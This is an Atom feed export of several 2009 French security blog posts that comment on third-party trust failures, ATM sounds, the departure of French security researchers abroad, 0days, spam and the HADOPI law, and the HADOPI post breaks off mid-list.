piratés&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;Le (défunt) &lt;a href="http://www.challenge-securitech.com/"&gt;Challenge Securitech&lt;/a&gt;. Bien sûr faire converger tous les « experts en sécurité » français (soyons clair, Securitech était devenu très « corporate » sur la fin :) sur un site où ils peuvent gagner un iPod en piratant était dangereux. Mais se faire avoir parce que l’hébergeur a désactivé l’option « &lt;a href="http://fr.php.net/manual/fr/security.magicquotes.php"&gt;magic quotes&lt;/a&gt; » est un peu humiliant quand même :)&lt;/li&gt;&lt;li&gt;Le blog d’&lt;a href="http://www.ivanlef0u.tuxfamily.org/?p=84"&gt;Ivanlef0u&lt;/a&gt;. En même temps, je ne vois pas qui peut assurer la sécurité d’un hébergement mutualisé en PHP. Ils serait plus facile de compiler OpenOffice sous OpenBSD.&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="text-decoration: underline;"&gt;Edit:&lt;/span&gt;&lt;/b&gt; n'oublions pas la fameuse démo du projet &lt;a href="http://adullact.net/forum/forum.php?forum_id=2398"&gt;SPAClik&lt;/a&gt; au &lt;a href="http://sid.rstack.org/blog/index.php/347-sstic-2009-en-direct-ou-presque"&gt;SSTIC'09&lt;/a&gt;. "Aucune faille n'a été trouvée dans mon système jusqu'à présent". On connait la suite, avec l'humiliation en direct sur scène.&lt;/li&gt;&lt;/ul&gt;Quel est le point commun entre tous ces cas ? La dépendance du niveau de sécurité global à celui des tierces parties impliquées.&lt;p&gt;&lt;/p&gt;&lt;p&gt;Ainsi dans mon cas, je suis dépendant de :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;La sécurité de ma &lt;a href="http://atomcomputer.free.fr/fbox/index.old.htm"&gt;Freebox&lt;/a&gt; (autant dire pas grand-chose, puisqu’elle est administrable à distance par au moins tout le personnel de Free).&lt;/li&gt;&lt;li&gt;La sécurité de mes fournisseurs de messagerie (Free, &lt;a href="http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/"&gt;Gmail&lt;/a&gt;, etc.). Autant dire pas grand-chose non plus, même si j’utilise de fausses réponses aux questions secrètes, que je ne lis jamais mon mail via l’interface Web, et que j’utilise un mot de passe différent sur chaque site. Car réaliser un &lt;i&gt;Webmail&lt;/i&gt; sécurisé relève de la &lt;a href="http://sid.rstack.org/blog/index.php/348-challenge-fail"&gt;mission impossible&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;La sécurité de mes machines à la maison. Ainsi « on » m’a fait remarquer que dans la configuration Debian par défaut du serveur ProFTDd, l’utilisateur anonyme peut accéder à tout le disque par un simple « ../ ». Mais qui fait encore confiance à Debian pour assurer sa sécurité ? :)&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Alors que peut-on faire ? Rien du tout, car en général il suffit que l’un de ces maillons soit brisé pour que le château de cartes s’écroule par le jeu des relations de confiance. La meilleure défense consiste à ne rien stocker de sensible qui ne soit accessible en ligne, car tout ce qui est connecté à Internet est ou peut être compromis.&lt;/p&gt;Pour tenter une analogie (avec tous les risques que &lt;a href="http://sid.rstack.org/blog/index.php/194-de-l-utilite-des-analogies"&gt;cela comporte&lt;/a&gt;), les digicodes ne servent à rien quelle que soit la longueur du code - à partir du moment où au moins un résident de l'immeuble a déjà commandé une pizza par téléphone (&lt;i&gt;disclaimer&lt;/i&gt;: je n'ai jamais audité le réseau Pizza Hut, je suppose juste que tous les digicodes sont stockés en clair dans leur base de données :).&lt;div&gt;&lt;br /&gt;&lt;div&gt;Alors quand on voit le nombre d'intermédiaires impliqués dans la &lt;a href="http://www.links.org/?p=650"&gt;gestion du réseau Internet en France&lt;/a&gt;, on peut se poser des questions sur la sécurité même de nos infrastructures critiques ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;(Que serait un billet polémique qui ne se termine pas sur impots.gouv.fr ? ;)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="text-decoration: underline;"&gt;Edit:&lt;/span&gt;&lt;/b&gt; je n'avais pas vu que le magazine Capital était arrivé &lt;a href="http://www.lavienumerique.com/articles/93819/pirater-site-web-est-portee-monde.html"&gt;exactement à la même conclusion&lt;/a&gt; ! Promis je n'étais pas au courant ...&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-941139588723788717?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/941139588723788717/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=941139588723788717' title='35 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/941139588723788717'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/941139588723788717'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/07/la-preuve-que-la-securite-est-un-echec.html' title='La preuve que la sécurité est un échec'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>35</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4868760247994421119</id><published>2009-07-24T08:00:00.002+02:00</published><updated>2009-07-24T08:00:00.688+02:00</updated><title type='text'>Psychose</title><content type='html'>Pour commencer, il vous faut écouter cette séquence avec attention (il s'agit d'un distributeur de billets de marque Diebold situé à Paris, strictement identique à tous les distributeurs déployés par la Société Générale en France):&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/1FvnM6HNUfI&amp;amp;hl=en&amp;amp;fs=1&amp;amp;"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/1FvnM6HNUfI&amp;amp;hl=en&amp;amp;fs=1&amp;amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si vous êtes utilisateur Windows, vous aurez reconnu sans peine le son "chimes" (C:\Windows\Media\chimes.wav) émis par ce distributeur (par dessus le bruit ambiant, désolé pour la piètre qualité de l'enregistrement).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Que viennent faire ici ces sons assez saugrenus, à part nous signaler que le distributeur tourne probablement sous une version quelconque de &lt;a href="http://www.microsoft.com/windowsembedded/"&gt;Windows Embedded&lt;/a&gt; (ou que la licence Microsoft a été violée) ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A la lecture de l'article "organiser la fuite d'information d'un poste isolé: méthodes logicielles" - et particulièrement du chapitre "attaque via le jingle Windows" (&lt;a href="http://www.ed-diamond.com/produit.php?produit=650"&gt;MISC n°44&lt;/a&gt;, entièrement lisible en ligne &lt;a href="http://ed-diamond.com/feuille_misc44/index.html"&gt;à cette adresse&lt;/a&gt;), un doute horrible me saisit: &lt;i&gt;et si ces sons servaient de stégo-medium à mon code PIN ?&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Depuis, je ne vais plus retirer de l'argent sans chanter à tue-tête quelque musique nordique conseillée par &lt;a href="http://www.ivanlef0u.tuxfamily.org/"&gt;Ivanlef0u&lt;/a&gt;. En l'état actuel des connaissances, aucun algorithme de traitement du signal ne peut extraire d'information utile dans ce bruit blanc.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4868760247994421119?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4868760247994421119/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4868760247994421119' title='11 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4868760247994421119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4868760247994421119'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/07/psychose.html' title='Psychose'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1550563786621186816</id><published>2009-07-03T08:00:00.001+02:00</published><updated>2009-07-03T14:05:53.369+02:00</updated><title type='text'>L'échec de la sécurité française</title><content type='html'>&lt;div&gt;&lt;i&gt;Ou pourquoi il faut arrêter de me saouler avec les "0day" ...&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Les français ne manquent pas de talent dans le domaine de la sécurité informatique. Malheureusement ils ne s'épanouissent pas forcément dans leur pays d'origine. Parmi les gens que j'ai connu personnellement et qui sont partis, on peut citer:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Kostya Kortchinsky&lt;/li&gt;&lt;/ul&gt;D'abord CERT Renater, puis EADS, et maintenant &lt;a href="http://www.immunitysec.com/"&gt;Immunity&lt;/a&gt; (à Miami). Il s'est illustré par l'exploitation de la faille &lt;a href="http://lists.immunitysec.com/pipermail/dailydave/2008-January/004860.html"&gt;MS08-001&lt;/a&gt; (qualifiée d'impossible par Microsoft) et l'évasion de VMWare (attaque &lt;a href="http://expertmiami.blogspot.com/2009/04/cloudburst-hacking-3d.html"&gt;CloudBurst&lt;/a&gt;).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Nicolas Pouvesle&lt;/li&gt;&lt;/ul&gt;Anciennement &lt;a href="http://www.tenablesecurity.com/"&gt;Tenable Network Security&lt;/a&gt; (n'oublions pas que &lt;a href="http://nessus.org/"&gt;Nessus&lt;/a&gt; est un produit français à l'origine), cité par H.D. Moore comme "&lt;a href="http://www.matasano.com/log/727/finger-79tcp-top-influencers-you-might-not-have-heard-of-or-not-enough/"&gt;&lt;i&gt;Top Influencer&lt;/i&gt;&lt;/a&gt;", contributeur du projet Metasploit, auteur du plugin &lt;a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php"&gt;PatchDiff2&lt;/a&gt; pour IDA Pro ... et maintenant chez Immunity également.&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Thomas Garnier&lt;/li&gt;&lt;/ul&gt;Anciennement &lt;a href="http://www.skyrecon.com/"&gt;SkyRecon&lt;/a&gt; (un autre produit français), auteur de failles innombrables dans le composant &lt;a href="http://www.google.com/search?hl=en&amp;amp;q=thomas+garnier+site:microsoft.com"&gt;GDI de Windows&lt;/a&gt;, il est parti chez Microsoft Corp. lors de la &lt;a href="http://www.skyrecon.com/fr/SkyRecon-de-la-start-up-Francaise-a-l-acteur-Europeen-de-reference"&gt;reprise en main&lt;/a&gt; de SkyRecon.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Julien Tinnès&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Anciennement FT R&amp;amp;D, il est parti (comme beaucoup d'autres) chez Google lorsque cette entité a été rattachée au marketing sous le nom d'Orange Labs. Il s'est illustré récemment sur la &lt;a href="http://blog.cr0.org/2009/05/write-once-own-everyone.html"&gt;faille Java util.calendar()&lt;/a&gt;, mais tourne en fait dans le milieu depuis longtemps.&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Julien Vanègue&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Chef de file du projet &lt;a href="http://www.eresi-project.org/"&gt;ERESI&lt;/a&gt;, il a fini par virer sa cuti et &lt;a href="http://www.linkedin.com/pub/julien-vanegue/4/869/740"&gt;rejoindre l'équipe MSEC&lt;/a&gt; de Microsoft.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr, il existe encore probablement beaucoup de gens de qualité dans &lt;i&gt;l'underground &lt;/i&gt;et &lt;i&gt;l'upperground &lt;/i&gt;français. Mais &lt;a href="http://sid.rstack.org/blog/index.php/353-presque-lundi-encore-loppsi"&gt;quand je lis&lt;/a&gt; que la mise en oeuvre de la LOPPSI va peut-être nécessiter des "0day" pour installer les mouchards à distance, je manque de m'étouffer.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Non seulement la plupart des gens ayant démontré publiquement une certaine capacité dans le domaine sont partis, mais de plus tous les programmes publics d'acquisition de "0day" sont étrangers (américains en fait, sauf feu-&lt;a href="http://blog.wslabi.com/"&gt;WabiSabiLabi&lt;/a&gt;).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si c'est pour faire appel à des projets universitaires, et sans mauvais esprit aucun (je ne suis pas connu pour ça :), on aura peut-être un &lt;i&gt;fuzzer &lt;/i&gt;pour les syscalls NT4 dans 3 ans après avoir usé 5 thésards ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si c'est pour mettre le flingue sur la table ou la tête dans le caniveau, ça ne marche pas: il est impossible pour un magicien de &lt;a href="http://www.wizards.com/default.asp?x=dnd/rg/20041207a"&gt;créer un objet magique sous la contrainte&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Alors bien sûr, quelques initiatives sortent du lot, comme la conférence &lt;a href="http://www.esiea-recherche.eu/iawacs_2009.html"&gt;iAWACS&lt;/a&gt;: &lt;i&gt;i&lt;/i&gt;&lt;i&gt;nternational Alternative Workshop on Aggressive Computing and Security - The No Limit Workshop&lt;/i&gt;, selon leurs termes.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;On pourrait imaginer un programme particulièrement alléchant, comme:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;i&gt;Remote Root&lt;/i&gt; sur les LiveBox &lt;span class="Apple-style-span"  style="font-size:small;"&gt;(ne rigolez pas, ça a existé)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;VIGIK: comment ouvrir toutes les serrures avec une clé privée&lt;/li&gt;&lt;li&gt;Sécurité du pass Navigo &lt;span class="Apple-style-span"  style="font-size:small;"&gt;(sur le modèle de &lt;/span&gt;&lt;a href="http://sites.uclouvain.be/security/fr-mobib.html"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Mobib Extractor&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Sécurité du site des impôts &lt;span class="Apple-style-span"  style="font-size:small;"&gt;(ou comment &lt;/span&gt;&lt;a href="http://www.lemagit.fr/article/securite-administration-dematerialisation-keynectis/3063/1/la-declaration-impot-affranchit-signature-electronique-danger/"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;économiser de l'argent en supprimant les certificats&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;La backdoor dans SecurityBox &lt;span class="Apple-style-span"  style="font-size:small;"&gt;(pudiquement appelée "&lt;/span&gt;&lt;a href="http://www.hsc.fr/ressources/veille/sbox.html.fr#flocaux"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;clé de recouvrement/séquestre&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;" dans l'étude publiée par HSC)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Etc.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Mais j'ai vaguement l'impression que le résultat final sera un peu moins sexy ... Espérons que les meilleures soumissions se verront exploitées sans passer par la case "publication" !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;todo&gt;&lt;/todo&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour finir, je campe sur ma position qui a toujours été claire depuis le début: &lt;i&gt;les "0day" ne servent à rien&lt;/i&gt; &lt;span class="Apple-style-span"  style="font-size:small;"&gt;(dans 99,9% des cas, je mets de côté le cas des systèmes vraiment protégés)&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ainsi le dernier numéro (n° 4/2009) du magazine &lt;a href="http://www.hakin9.org/"&gt;Hakin9&lt;/a&gt; m'est arrivé en anglais. Erreur de routage ou disparition de la version française ? Peu importe, la version anglaise est finalement comparable à la version française: les articles sont extrêmement inégaux en qualité (sur le fond et sur la forme).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et là, un certain &lt;a href="https://www.xing.com/profile/Carsten_Koehler2"&gt;Carsten Köhler&lt;/a&gt; (visiblement &lt;a href="http://www.devtarget.org/downloads.html"&gt;très actif&lt;/a&gt; par ailleurs) nous délivre ses &lt;i&gt;tricks &lt;/i&gt;de pentesteur, et explique par exemple qu'il est possible de créer des fichiers arbitraires sur n'importe quel système Windows qui partage au moins une imprimante.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je reviendrai plus tard sur les détails techniques, mais voilà exactement le genre d'astuce qui marche "pour de vrai": une faille de conception (donc très difficile à corriger), multi-versions, multi-langues, ne risquant pas de planter le système distant, exploitable via les API Windows. Rien à voir avec un "0day" au sens où on l'entend d'habitude !&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1550563786621186816?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1550563786621186816/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1550563786621186816' title='102 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1550563786621186816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1550563786621186816'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html' title='L&apos;échec de la sécurité française'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>102</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2155240259898848992</id><published>2009-06-29T16:38:00.002+02:00</published><updated>2009-06-29T16:44:11.444+02:00</updated><title type='text'>IKEArt</title><content type='html'>Je suis en vacances en ce moment, ce qui explique que je ne blogue pas (et que je ne suis pas à &lt;a href="http://www.hackerspace.net/"&gt;Hacker Space Festival&lt;/a&gt;). Mais ne vous inquiétez pas, j'ai toujours des choses à dire !&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En attendant, voici un peu d'IKEArt (j'étais assez fier de moi sur le coup :)&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/IKEArt.jpg" style="text-decoration: none;"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 480px; height: 360px;" src="http://newsoft.dyndns.org/blog/IKEArt.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2155240259898848992?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2155240259898848992/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2155240259898848992' title='3 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2155240259898848992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2155240259898848992'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/06/ikeart.html' title='IKEArt'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2935759600866649653</id><published>2009-05-27T22:20:00.000+02:00</published><updated>2009-05-27T22:24:33.660+02:00</updated><title type='text'>Spam fail</title><content type='html'>&lt;div&gt;Je ne prends plus la peine de commenter la créativité et la diversité des messages commerciaux non sollicités (&lt;span class="Apple-style-span" style="font-style: italic;"&gt;spam&lt;/span&gt;) que je reçois, par manque de temps pour bloguer. Mais c'est souvent un plaisir que de parcourir la boite à spam en début de matinée, tout en sirotant 1L de café lyophilisé (je reçois environ 800 spams par jour).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Pour ceux qui ne connaissent pas le client de messagerie Outlook, sachez que Word est l'éditeur de courier par défaut (s'il est installé). Ce qui offre des possibilités intéressantes, comme une correction orthographique et grammaticale de qualité.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais Word dispose de bien d'autres fonctions. C'est ainsi que j'ai récemment reçu un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;spam&lt;/span&gt; dans lequel ... le mode "révision" était activé ! Ce qui permet de connaitre toutes les modifications antérieures du message.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/echec_total.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/echec_total.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Spam fail.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Allez, pour la route, voici une capture d'écran du message s'affichant sur le Hotspot WiFi de la &lt;a href="http://www.cite-sciences.fr/"&gt;Cité des Sciences&lt;/a&gt; il y a quelques mois (merci &lt;a href="http://natisbad.org/"&gt;Arno&lt;/a&gt; pour cette perle).&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/Conficker_fail.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 408px; height: 306px;" src="http://newsoft.dyndns.org/blog/Conficker_fail.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2935759600866649653?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2935759600866649653/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2935759600866649653' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2935759600866649653'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2935759600866649653'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/05/spam-fail.html' title='Spam fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6574616402740859801</id><published>2009-05-22T21:08:00.002+02:00</published><updated>2009-05-22T23:10:09.646+02:00</updated><title type='text'>Un avis d'expert sur HADOPI</title><content type='html'>Déjà être expert ça n'est pas grand chose - après tout il y en a environ 325 millions d'après &lt;a href="http://www.google.fr/search?q=expert"&gt;Google&lt;/a&gt;. Pas comme les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Senior Experts&lt;/span&gt;, les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Executive Experts&lt;/span&gt; ou les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Technical Evangelists&lt;/span&gt; :)&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ensuite le débat est clos, puisque la loi a été votée. L'avenir est à la &lt;a href="http://www.zdnet.fr/blogs/2009/05/20/lopsi-2-la-loi-qui-va-imposer-le-filtrage-d-internet-en-france-/"&gt;LOPPSI 2&lt;/a&gt; (avec deux 'P', puisque cela signifie &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Loi d'Orientation et de Programmation Pour la Sécurité Intérieure&lt;/span&gt;).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enfin je n'ai pas lu le texte de loi, car le juridique est un domaine rébarbatif au possible pour les non-juristes (sauf ceux qui aiment à placer quelque locution latine au milieu d'un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;slide PowerPoint&lt;/span&gt;, mais ils se font rares).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais comme les &lt;a href="http://fr.wikipedia.org/wiki/Troll_(Internet_et_Usenet)"&gt;trolls&lt;/a&gt; restent nombreux et poilus en cette saison, essayons de réfléchir 5 minutes aux moyens &lt;span class="Apple-style-span" style="font-style: italic;"&gt;techniques&lt;/span&gt; d'empêcher le téléchargement d'oeuvres dites "protégées" (essentiellement films et musiques) - dont l'objet est par ailleurs d'être diffusées le plus largement possible.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le texte de loi semble orienté à l'encontre du &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;téléchargement&lt;/span&gt;. C'est une méthode comme une autre, car dans les années 80 circulaient déjà dans les cours de récréation disquettes Atari ou Amiga. Dans les années 90 ce furent les "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;LAN parties&lt;/span&gt;" qui favorisaient les échanges, puis au début des années 2000 il n'était pas rare de voir circuler pochettes ou &lt;span class="Apple-style-span" style="font-style: italic;"&gt;spindles&lt;/span&gt; de CD dans les soirées. Depuis, tout le monde s'est converti au disque externe de 1 To (ou plus). Une taxe a d'ailleurs été votée en son temps sur les supports de stockage. L'échange &lt;span class="Apple-style-span" style="font-style: italic; "&gt;via&lt;/span&gt; Internet avec des inconnus est certes plus pratique, mais finalement moins socialisant ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Notons que le "téléchargement" reste une notion assez vague, le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;peer-to-peer&lt;/span&gt; (P2P) ne représentant qu'une partie de l'iceberg composé du &lt;span class="Apple-style-span" style="font-style: italic;"&gt;streaming&lt;/span&gt;, des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;newsgroups&lt;/span&gt;, du téléchargement direct (ex. &lt;a href="http://www.rapidshare.com/"&gt;RapidShare&lt;/a&gt;) parfois payant, voire du piratage de &lt;a href="http://apple.slashdot.org/article.pl?sid=09/03/10/2116219"&gt;iTunes&lt;/a&gt; par des chinois.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il serait donc techniquement nécessaire de contrôler tous les usages d'Internet. Pour cela, il existe 3 solutions (non mutuellement exclusives):&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Contrôler le serveur source&lt;/span&gt; (par exemple, mettre en place un faux serveur eDonkey). Cette solution - pratiquée par des sociétés comme &lt;a href="http://www.mediasentry.com/"&gt;MediaSentry&lt;/a&gt; - est légalement douteuse et ne passe pas à l'échelle, vu la prolifération de l'offre.&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Contrôler le réseau&lt;/span&gt;. Une solution très alléchante, mais qui présente deux inconvénients: elle ne supporte pas la cryptographie ; et elle nécessite une infrastructure technique de filtrage et de journalisation (à valeur probante) considérable, pour laquelle ni l'Etat ni les FAI ne sont prêts à payer.&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Contrôler le client 